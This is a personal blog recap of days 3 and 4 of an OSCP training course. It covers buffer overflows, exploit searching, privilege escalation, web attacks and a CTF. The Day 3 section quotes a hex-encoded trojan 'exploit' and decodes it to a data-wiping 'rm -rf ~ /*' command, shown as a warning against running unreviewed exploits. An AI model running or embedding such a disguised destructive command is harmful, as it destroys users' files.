Day 3
Today was a very interesting day. Is definitely improving. The day started with more buffer overflows of yesterday. Especially we focus on getting a shell using msfvenon.
The instructor gave the first little tip of the OSCP. So far the content is good but I really was expecting some more tips, explanations, etc of the day of the exam…
After the buffers overflows they showed us how to search in exploitdb both in the command line “searchsploit” and the website.
It was cool that they showed us a fake exploit and the consequences of running one without reviewing what it does. Look at it here. In summary.
char jmpcode[] =
"x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
"x64x65x76x2fx6ex75x6cx6cx20x26";
Which starts to looks familiar when run through an online Hex to ASCII decode:
?????r?m? ?-?r?f? ?~? ?/?*? ?2?>? ?/??????d?e?v?/?n?u?l?l? ?&?
When you strip out and clean it up it looks like this:
"rm -rf ~ /* 2> /dev/null &"
Super coool.
After that we fixed some exploits of exploit dbs and the take away of that is that offensive security owns exploitdb (i didnt knew) so almost for sure the stuff of here will be in the exam.
As a technology nugget they talked about methods of transferring files in machines. It was cool to see smb, ftp and the classic SimpleHttpServer
Almost at the end of the day they taught us basic (very basic) privilege escalation techniques for windows and linux. Without using any script.
I won another sticker by getting a privilege escalation of a device. I used sherlock and a precompiled exploit but it worked like magic 😉
The last thing we did was a little bit of metasploit.
Grade 7.5/10 the content of the day was good but Im missing tips and tricks of the exam to be honest..
Day 4
Today was a very long long day. Yesterday (day 3) They asked us about how long does we want to stay doing the CTF of today. We decide till midnight.
The first part of the day was metasploit, kind of wrapping up the day 3. Adter doing that The web stuff started.
To be honest the web part was super basic. A little bit of SQL (manual) injection. A little bit of XSS examples and why is bad, RFI, LFI, Etc. If you wanna do web eWAP is much better.
The interesting part for me was Hydra. They told us how to connect it to Burp. It was mostly for debugging but was interesting.
export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
At 4 we had a break and at 5 we started the CTF. Some stuff was super hard (they mentioned that it was going to be more difficult than the OSCP). I only manage to Root a box and I got SQLinjection in another box.
They have a very interesting strategy. If you get bored you can ask for extra stuff to do. I felt unprepared with the Buffer overflows so I did 2 extras. I fell way much more confortable now :). Again the instructors are super helpful, Is not what you expect of a moron just saying Try Harder…
Overall was an interesting team-event and the instructors of Offensive Security were super professional. They stayed till after midnight happy faces, answering questions. I still dont know how well (or bad) prepared im from my OSCP but today was fun.
Grade 9/10 the web stuff was basic but the CTF was very interesting.
————–
Edit. I passed on my first attempt 🙂
https://mexicanpentester.com/2020/02/07/how-i-passed-my-oscp-in-my-first-attempt/
